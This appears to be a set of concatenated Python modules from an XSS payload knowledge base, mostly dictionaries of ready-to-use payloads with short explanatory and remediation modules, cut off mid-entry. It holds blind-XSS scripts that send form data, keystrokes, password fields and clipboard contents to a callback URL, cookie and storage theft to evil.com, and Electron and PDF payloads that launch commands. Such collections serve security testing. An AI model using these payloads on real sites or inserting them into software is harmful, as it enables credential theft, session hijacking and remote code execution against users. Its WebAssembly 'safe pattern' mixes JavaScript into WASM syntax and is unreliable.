#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

Blind Payloads - Part 2
"""

from typing import Dict

from ..models import PayloadEntry


BLIND_XSS_CORE_PAYLOADS_PART2: Dict[str, PayloadEntry] = {
    "blind_xss_035": PayloadEntry(
        payload='<script>setTimeout(function(){var forms=document.forms;for(var i=0;i<forms.length;i++){var formData=new FormData(forms[i]);var data={};for(var pair of formData.entries()){data[pair[0]]=pair[1]};fetch("{{CALLBACK_URL}}?form="+encodeURIComponent(JSON.stringify(data)))}},1000)</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_036": PayloadEntry(
        payload='<script>setTimeout(function(){var inputs=document.querySelectorAll("input,textarea,select");var data={};for(var i=0;i<inputs.length;i++){if(inputs[i].name)data[inputs[i].name]=inputs[i].value};fetch("{{CALLBACK_URL}}?inputs="+encodeURIComponent(JSON.stringify(data)))},1000)</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_037": PayloadEntry(
        payload="<img src=x onerror=\"setInterval(function(){fetch('{{CALLBACK_URL}}?persistent=img_interval&t='+Date.now())},10000)\">",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_038": PayloadEntry(
        payload='<script>setInterval(function(){fetch("{{CALLBACK_URL}}?persistent=script_interval&t="+Date.now())},30000)</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_039": PayloadEntry(
        payload='<script>window.addEventListener("load",function(){fetch("{{CALLBACK_URL}}?persistent=window_load&t="+Date.now())})</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_040": PayloadEntry(
        payload='<script>localStorage.setItem("xss_callback","{{CALLBACK_URL}}");setInterval(function(){fetch(localStorage.getItem("xss_callback")+"?persistent=localStorage&t="+Date.now())},60000)</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_041": PayloadEntry(
        payload='<script>sessionStorage.setItem("xss_callback","{{CALLBACK_URL}}");setInterval(function(){fetch(sessionStorage.getItem("xss_callback")+"?persistent=sessionStorage&t="+Date.now())},60000)</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_042": PayloadEntry(
        payload='<script>document.addEventListener("DOMContentLoaded",function(){fetch("{{CALLBACK_URL}}?persistent=dom_ready&t="+Date.now())})</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_043": PayloadEntry(
        payload='<script>if(document.readyState==="loading"){document.addEventListener("DOMContentLoaded",function(){fetch("{{CALLBACK_URL}}?persistent=dom_ready2&t="+Date.now())})}else{fetch("{{CALLBACK_URL}}?persistent=dom_ready_immediate&t="+Date.now())}</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_044": PayloadEntry(
        payload='<script>var observer=new MutationObserver(function(){fetch("{{CALLBACK_URL}}?persistent=mutation&t="+Date.now())});observer.observe(document.body,{childList:true,subtree:true})</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_045": PayloadEntry(
        payload='<script>if("serviceWorker" in navigator){navigator.serviceWorker.register("data:application/javascript,self.addEventListener(\\"message\\",function(e){fetch(\\"{{CALLBACK_URL}}?persistent=sw&t=\\"+Date.now())})")}</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_046": PayloadEntry(
        payload='<script>setTimeout(function(){fetch("{{CALLBACK_URL}}?timing=5sec&t="+Date.now())},5000)</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_047": PayloadEntry(
        payload='<script>setTimeout(function(){fetch("{{CALLBACK_URL}}?timing=10sec&t="+Date.now())},10000)</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_048": PayloadEntry(
        payload='<script>setTimeout(function(){fetch("{{CALLBACK_URL}}?timing=30sec&t="+Date.now())},30000)</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_049": PayloadEntry(
        payload='<script>setTimeout(function(){fetch("{{CALLBACK_URL}}?timing=60sec&t="+Date.now())},60000)</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_050": PayloadEntry(
        payload='<script>setTimeout(function(){fetch("{{CALLBACK_URL}}?timing=random&t="+Date.now())},Math.random()*10000)</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_051": PayloadEntry(
        payload='<script>setTimeout(function(){fetch("{{CALLBACK_URL}}?timing=random_long&t="+Date.now())},Math.random()*60000)</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_052": PayloadEntry(
        payload='<script>for(var i=1;i<=5;i++){setTimeout(function(x){return function(){fetch("{{CALLBACK_URL}}?timing=multi&count="+x+"&t="+Date.now())}}(i),i*5000)}</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_053": PayloadEntry(
        payload='<script>document.addEventListener("visibilitychange",function(){if(!document.hidden){fetch("{{CALLBACK_URL}}?timing=visible&t="+Date.now())}});document.addEventListener("focus",function(){fetch("{{CALLBACK_URL}}?timing=focus&t="+Date.now())})</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_054": PayloadEntry(
        payload='<script>window.addEventListener("scroll",function(){clearTimeout(window.scrollTimer);window.scrollTimer=setTimeout(function(){fetch("{{CALLBACK_URL}}?timing=scroll&t="+Date.now())},1000)})</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_055": PayloadEntry(
        payload='<script>fetch("{{CALLBACK_URL}}?browser="+encodeURIComponent(navigator.userAgent+"||"+navigator.vendor+"||"+window.opera))</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_056": PayloadEntry(
        payload='<script>var info="Chrome:"+(!!window.chrome)+" Firefox:"+(navigator.userAgent.indexOf("Firefox")>-1)+" Safari:"+(navigator.userAgent.indexOf("Safari")>-1&&navigator.userAgent.indexOf("Chrome")==-1)+" Edge:"+(navigator.userAgent.indexOf("Edge")>-1);fetch("{{CALLBACK_URL}}?detection="+encodeURIComponent(info))</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_057": PayloadEntry(
        payload='<script>fetch("{{CALLBACK_URL}}?platform="+encodeURIComponent(navigator.platform+"||"+navigator.oscpu))</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_058": PayloadEntry(
        payload='<script>var mobile=/Android|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);fetch("{{CALLBACK_URL}}?mobile="+mobile)</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_059": PayloadEntry(
        payload='<script>var isAdmin=location.href.indexOf("admin")>-1||location.href.indexOf("dashboard")>-1||document.title.indexOf("Admin")>-1;fetch("{{CALLBACK_URL}}?admin="+isAdmin)</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_060": PayloadEntry(
        payload='<script>var adminElements=document.querySelectorAll("[href*=admin],[href*=dashboard],[class*=admin],[id*=admin]").length;fetch("{{CALLBACK_URL}}?adminElements="+adminElements)</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_061": PayloadEntry(
        payload='<script>var frameworks="jQuery:"+(!!window.jQuery)+" Angular:"+(!!window.angular)+" React:"+(!!window.React)+" Vue:"+(!!window.Vue);fetch("{{CALLBACK_URL}}?frameworks="+encodeURIComponent(frameworks))</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_062": PayloadEntry(
        payload='<script>var libs="Bootstrap:"+(!!window.bootstrap||!!$().modal)+" Moment:"+(!!window.moment)+" Lodash:"+(!!window._);fetch("{{CALLBACK_URL}}?libs="+encodeURIComponent(libs))</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_063": PayloadEntry(
        payload='<script>var csp=document.querySelector("meta[http-equiv*=Content-Security-Policy]");fetch("{{CALLBACK_URL}}?csp="+(csp?encodeURIComponent(csp.content):"none"))</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_064": PayloadEntry(
        payload='<script>var xframe=document.querySelector("meta[http-equiv*=X-Frame-Options]");fetch("{{CALLBACK_URL}}?xframe="+(xframe?encodeURIComponent(xframe.content):"none"))</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_065": PayloadEntry(
        payload='<script>var keys="";document.addEventListener("keypress",function(e){keys+=String.fromCharCode(e.which);if(keys.length>50){fetch("{{CALLBACK_URL}}?keys="+encodeURIComponent(keys));keys=""}});setInterval(function(){if(keys.length>0){fetch("{{CALLBACK_URL}}?keys="+encodeURIComponent(keys));keys=""}},10000)</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_066": PayloadEntry(
        payload='<script>document.addEventListener("focusin",function(e){if(e.target.tagName==="INPUT"||e.target.tagName==="TEXTAREA"){var keys="";var target=e.target;target.addEventListener("keypress",function(ke){keys+=String.fromCharCode(ke.which)});target.addEventListener("blur",function(){if(keys.length>0){fetch("{{CALLBACK_URL}}?formkeys="+encodeURIComponent(target.name+"="+keys))}})}})</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_067": PayloadEntry(
        payload='<script>setInterval(function(){var passFields=document.querySelectorAll("input[type=password]");for(var i=0;i<passFields.length;i++){if(passFields[i].value.length>0){fetch("{{CALLBACK_URL}}?password="+encodeURIComponent(passFields[i].value));passFields[i].value=""}}},5000)</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
    "blind_xss_068": PayloadEntry(
        payload='<script>document.addEventListener("paste",function(e){setTimeout(function(){var clipboardData=e.clipboardData||window.clipboardData;var pastedData=clipboardData.getData("Text");if(pastedData.length>0){fetch("{{CALLBACK_URL}}?clipboard="+encodeURIComponent(pastedData))}},100)});navigator.clipboard&&navigator.clipboard.readText&&setInterval(function(){navigator.clipboard.readText().then(function(text){if(text.length>0){fetch("{{CALLBACK_URL}}?clipboard2="+encodeURIComponent(text))}}).catch(function(){})},30000)</script>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Blind Xss payload",
        tags=["blind-xss", "callback"],
        waf_evasion=False,
    ),
}



#!/usr/bin/env python3

"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Created
Telegram: https://t.me/EasyProTech

Speculation Rules API Context - Data Module
"""

DESCRIPTION = """
Speculation Rules API allows browsers to prefetch and prerender pages.
The API uses JSON rules that can be exploited for XSS if user input is injected
into speculation rules, allowing navigation to malicious URLs or execution of scripts.

Vulnerability occurs when:
- User-controlled data is injected into speculation rules JSON
- URLs in rules are user-controlled
- Prefetch/prerender targets contain user input
- Rules structure is manipulated via user input

Common injection points:
- urls array values
- source values
- where conditions
- eagerness settings
- JSON structure manipulation
"""

ATTACK_VECTOR = """
1. URL injection in rules:
   <script type="speculationrules">
   {"prefetch":[{"source":"list","urls":["USER_INPUT"]}]}
   </script>

2. JavaScript protocol:
   <script type="speculationrules">
   {"prefetch":[{"source":"list","urls":["javascript:alert(1)"]}]}
   </script>

3. Data URL injection:
   <script type="speculationrules">
   {"prefetch":[{"source":"list","urls":["data:text/html,<script>alert(1)</script>"]}]}
   </script>

4. JSON injection:
   <script type="speculationrules">
   {"prefetch":[{"source":"list","urls":["/page"]}],"USER_INPUT":"value"}
   </script>

5. Prerender with injection:
   <script type="speculationrules">
   {"prerender":[{"source":"list","urls":["USER_INPUT"]}]}
   </script>
"""

REMEDIATION = """
1. Never allow user input in speculation rules JSON
2. Whitelist allowed URLs for prefetch/prerender
3. Validate all URLs against allowlist
4. Block javascript: and data: protocols
5. Sanitize JSON before parsing speculation rules
6. Use Content Security Policy (CSP)
7. Validate speculation rules structure
8. Audit all speculation rules generation code
"""



#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-26 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

Session Hijacking Payloads
"""

from ..models import PayloadEntry


SESSION_HIJACK_PAYLOADS = {
    "session_1": PayloadEntry(
        payload="<script>fetch('//evil.com/hijack',{method:'POST',body:JSON.stringify({cookie:document.cookie,url:location.href})})</script>",
        contexts=["html_content", "javascript"],
        severity="critical",
        cvss_score=9.5,
        description="Session hijack with context",
        tags=["session", "hijack", "context"],
        reliability="high",
    ),
    "session_2": PayloadEntry(
        payload="<script>fetch('//evil.com/hijack',{method:'POST',body:JSON.stringify({storage:localStorage,session:sessionStorage})})</script>",
        contexts=["html_content", "javascript"],
        severity="critical",
        cvss_score=9.5,
        description="Storage hijack",
        tags=["session", "hijack", "storage"],
        reliability="high",
    ),
    "session_3": PayloadEntry(
        payload="<script>fetch('//evil.com/hijack',{method:'POST',credentials:'include',body:JSON.stringify({cookie:document.cookie})})</script>",
        contexts=["html_content", "javascript"],
        severity="critical",
        cvss_score=9.5,
        description="Session hijack with credentials",
        tags=["session", "hijack", "include"],
        reliability="high",
    ),
}

SESSION_HIJACK_PAYLOADS_TOTAL = len(SESSION_HIJACK_PAYLOADS)



#!/usr/bin/env python3

"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-26 UTC
Status: Created
Telegram: https://t.me/EasyProTech

Knowledge Base: WebAssembly GC XSS
"""

DETAILS = {
    "title": "Cross-Site Scripting (XSS) via WebAssembly Garbage Collection",
    "severity": "high",
    "cvss_score": 7.5,
    "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N",
    "reliability": "medium",
    "cwe": ["CWE-79", "CWE-119"],
    "owasp": ["A03:2021"],
    "tags": ["xss", "wasm", "gc", "garbage-collection", "memory", "proposal"],
    "description": """
WebAssembly GC (proposal) adds garbage collection to WASM. XSS vulnerabilities occur when
user input controls GC object creation, type definitions, or memory operations without validation.

SEVERITY: HIGH
Low-level memory access can lead to memory corruption and arbitrary code execution.
""",
    "attack_vector": """
WASM GC TYPE INJECTION:
(type $UserType (struct (field $data (ref string))))
// XSS if type definition is user-controlled

WASM GC OBJECT CREATION:
struct.new $UserType (string.const userInput)  // XSS if userInput is malicious

WASM GC MEMORY ACCESS:
local.get $index
struct.get $UserType $data  // XSS if index is out of bounds

WASM GC ARRAY INJECTION:
array.new $ArrayType (i32.const userInput)  // XSS if size is controlled

WASM GC WITH JAVASCRIPT:
const wasmModule = await WebAssembly.instantiateStreaming(
  fetch('module.wasm'),
  {
    env: {
      getData: () => userInput  // XSS if returned to JavaScript
    }
  }
);
""",
    "remediation": """
DEFENSE:

1. Validate all WASM type definitions
2. Validate GC object data before creation
3. Bounds check all memory access
4. Sanitize data passed between WASM and JavaScript
5. Use TypedArray for safe memory access

SAFE PATTERN:
function validateWasmData(data) {
  if (data.length > 1024) {
    throw new Error('Data too large');
  }
  // Additional validation
  return data;
}
struct.new $UserType (string.const validateWasmData(userInput))

MEMORY VALIDATION:
function safeMemoryAccess(wasmMemory, index) {
  if (index < 0 || index >= wasmMemory.length) {
    throw new RangeError('Index out of bounds');
  }
  return wasmMemory[index];
}

OWASP REFERENCES:
- CWE-79: Cross-site Scripting
- CWE-119: Improper Restriction of Operations within Bounds
- WebAssembly GC Proposal
""",
}



#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Active
Telegram: https://t.me/EasyProTech

Priority Context Enrichment
Additional payloads for high-priority contexts with low coverage.
"""

from ..models import Encoding, PayloadEntry, Reliability, Severity


# === React Additional ===
REACT_PRIORITY_PAYLOADS = {
    "react-dangerously-jsx": PayloadEntry(
        payload="<div dangerouslySetInnerHTML={{__html: `<img src=x onerror=alert(1)>`}}/>",
        contexts=["react", "javascript", "html_content"],
        severity=Severity.CRITICAL,
        cvss_score=8.5,
        description="React dangerouslySetInnerHTML with template literal",
        tags=["react", "dangerously", "template", "literal"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "react-useEffect-innerHTML": PayloadEntry(
        payload='useEffect(() => { document.getElementById("x").innerHTML = props.html; }, [props.html]);',
        contexts=["react", "javascript"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="React useEffect with innerHTML assignment",
        tags=["react", "useEffect", "innerHTML", "hook"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "react-href-prop": PayloadEntry(
        payload="<a href={userInput}>Link</a>",
        contexts=["react", "javascript", "url"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="React href prop with javascript: protocol",
        tags=["react", "href", "prop", "javascript"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
}

# === Vue Additional ===
VUE_PRIORITY_PAYLOADS = {
    "vue-compile-template": PayloadEntry(
        payload="Vue.compile(`<div v-html=\"'<img src=x onerror=alert(1)>'\">`)",
        contexts=["vue", "javascript", "template"],
        severity=Severity.CRITICAL,
        cvss_score=9.0,
        description="Vue.compile with v-html in template",
        tags=["vue", "compile", "v-html", "template"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "vue-v-bind-href": PayloadEntry(
        payload='<a v-bind:href="userInput">Click</a>',
        contexts=["vue", "html_content", "url"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Vue v-bind:href javascript protocol",
        tags=["vue", "v-bind", "href", "javascript"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "vue-v-on-dynamic": PayloadEntry(
        payload='<div v-on:[eventName]="handler">',
        contexts=["vue", "html_content"],
        severity=Severity.HIGH,
        cvss_score=7.0,
        description="Vue dynamic event handler name",
        tags=["vue", "v-on", "dynamic", "event"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === jQuery Additional ===
JQUERY_PRIORITY_PAYLOADS = {
    "jquery-prepend": PayloadEntry(
        payload='$("body").prepend(userInput)',
        contexts=["jquery", "javascript"],
        severity=Severity.CRITICAL,
        cvss_score=8.5,
        description="jQuery prepend with user input",
        tags=["jquery", "prepend", "dom", "injection"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "jquery-after": PayloadEntry(
        payload='$("div").after(userInput)',
        contexts=["jquery", "javascript"],
        severity=Severity.CRITICAL,
        cvss_score=8.5,
        description="jQuery after insertion",
        tags=["jquery", "after", "insertion", "dom"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "jquery-replaceWith": PayloadEntry(
        payload='$("div").replaceWith(userInput)',
        contexts=["jquery", "javascript"],
        severity=Severity.CRITICAL,
        cvss_score=8.5,
        description="jQuery replaceWith injection",
        tags=["jquery", "replaceWith", "dom", "injection"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "jquery-wrap": PayloadEntry(
        payload='$("div").wrap(userInput)',
        contexts=["jquery", "javascript"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="jQuery wrap with HTML",
        tags=["jquery", "wrap", "html", "dom"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
}

# === Fetch API Additional ===
FETCH_PRIORITY_PAYLOADS = {
    "fetch-eval-response": PayloadEntry(
        payload="fetch(url).then(r=>r.text()).then(eval)",
        contexts=["fetch", "javascript"],
        severity=Severity.CRITICAL,
        cvss_score=9.5,
        description="Fetch response directly to eval",
        tags=["fetch", "eval", "response", "rce"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "fetch-json-innerHTML": PayloadEntry(
        payload="fetch(url).then(r=>r.json()).then(d=>{el.innerHTML=d.html})",
        contexts=["fetch", "javascript", "json"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Fetch JSON to innerHTML",
        tags=["fetch", "json", "innerHTML", "xss"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "fetch-redirect-ssrf": PayloadEntry(
        payload='fetch(userUrl, {redirect: "follow"})',
        contexts=["fetch", "javascript", "url"],
        severity=Severity.HIGH,
        cvss_score=7.0,
        description="Fetch with redirect following (SSRF)",
        tags=["fetch", "redirect", "ssrf", "follow"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
}

# === WebSocket Additional ===
WEBSOCKET_PRIORITY_PAYLOADS = {
    "websocket-onmessage-html": PayloadEntry(
        payload="ws.onmessage = (e) => { document.body.innerHTML += e.data; }",
        contexts=["websocket_handler", "websocket_message", "javascript"],
        severity=Severity.CRITICAL,
        cvss_score=8.5,
        description="WebSocket message to innerHTML",
        tags=["websocket", "onmessage", "innerHTML", "xss"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "websocket-json-eval": PayloadEntry(
        payload='ws.onmessage = (e) => { const msg = JSON.parse(e.data); if(msg.type==="eval") eval(msg.code); }',
        contexts=["websocket_handler", "websocket_message", "javascript", "json"],
        severity=Severity.CRITICAL,
        cvss_score=9.5,
        description="WebSocket JSON command execution",
        tags=["websocket", "json", "eval", "command"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "websocket-url-injection": PayloadEntry(
        payload='new WebSocket("wss://evil.com/ws?token=" + document.cookie)',
        contexts=["websocket_url", "javascript"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="WebSocket URL with cookie exfil",
        tags=["websocket", "url", "cookie", "exfil"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
}

# === Electron Additional (Desktop apps) ===
ELECTRON_PRIORITY_PAYLOADS = {
    "electron-shell-openExternal": PayloadEntry(
        payload='require("electron").shell.openExternal(userUrl)',
        contexts=["electron", "javascript", "url"],
        severity=Severity.CRITICAL,
        cvss_score=9.5,
        description="Electron shell.openExternal (RCE)",
        tags=["electron", "shell", "openExternal", "rce"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "electron-nodeIntegration": PayloadEntry(
        payload="<webview src=\"data:text/html,<script>require('child_process').exec('calc')</script>\" nodeintegration></webview>",
        contexts=["electron", "html_content"],
        severity=Severity.CRITICAL,
        cvss_score=10.0,
        description="Electron webview nodeIntegration RCE",
        tags=["electron", "webview", "nodeintegration", "rce"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "electron-preload-bypass": PayloadEntry(
        payload='window.top.require("child_process").exec("id")',
        contexts=["electron", "javascript"],
        severity=Severity.CRITICAL,
        cvss_score=10.0,
        description="Electron preload script bypass",
        tags=["electron", "preload", "bypass", "rce"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === PDF XSS Additional ===
PDF_PRIORITY_PAYLOADS = {
    "pdf-launch-action": PayloadEntry(
        payload="/Type /Action /S /Launch /Win << /F (cmd.exe) /P (/c calc) >>",
        contexts=["pdf", "javascript"],
        severity=Severity.CRITICAL,
        cvss_score=9.0,
        description="PDF Launch action (RCE)",
        tags=["pdf", "launch", "action", "rce"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "pdf-javascript-action": PayloadEntry(
        payload="/Type /Action /S /JavaScript /JS (app.alert(1))",
        contexts=["pdf", "javascript"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="PDF JavaScript action",
        tags=["pdf", "javascript", "action", "xss"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "pdf-submitform": PayloadEntry(
        payload="/Type /Action /S /SubmitForm /F (https://evil.com/steal)",
        contexts=["pdf", "url"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="PDF SubmitForm to attacker",
        tags=["pdf", "submitform", "exfil", "form"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === GraphQL Additional ===
GRAPHQL_PRIORITY_PAYLOADS = {
    "graphql-query-stored": PayloadEntry(
        payload="query{user(id:1){bio}}",
        contexts=["graphql_query", "json"],
        severity=Severity.HIGH,
        cvss_score=7.0,
        description="GraphQL query returning stored XSS",
        tags=["graphql", "query", "stored", "xss"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "graphql-query-introspection": PayloadEntry(
        payload="query{__schema{types{name fields{name}}}}",
        contexts=["graphql_query", "json"],
        severity=Severity.MEDIUM,
        cvss_score=5.0,
        description="GraphQL introspection query",
        tags=["graphql", "introspection", "schema", "recon"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "graphql-variable-xss": PayloadEntry(
        payload='{"query":"mutation($x:String!){update(val:$x)}","variables":{"x":"<script>alert(1)</script>"}}',
        contexts=["graphql_variable", "graphql_mutation", "json"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="GraphQL variable with XSS payload",
        tags=["graphql", "variable", "mutation", "xss"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
}

# === PostMessage Additional ===
POSTMESSAGE_PRIORITY_PAYLOADS = {
    "postmessage-no-origin-check": PayloadEntry(
        payload='window.addEventListener("message", (e) => { eval(e.data); })',
        contexts=["postmessage", "javascript"],
        severity=Severity.CRITICAL,
        cvss_score=9.5,
        description="postMessage without origin check",
        tags=["postmessage", "no-origin", "eval", "xss"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "postmessage-innerHTML": PayloadEntry(
        payload='window.addEventListener("message", (e) => { document.body.innerHTML = e.data.html; })',
        contexts=["postmessage", "javascript"],
        severity=Severity.HIGH,
        cvss_score=8.0,
        description="postMessage to innerHTML",
        tags=["postmessage", "innerHTML", "dom", "xss"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
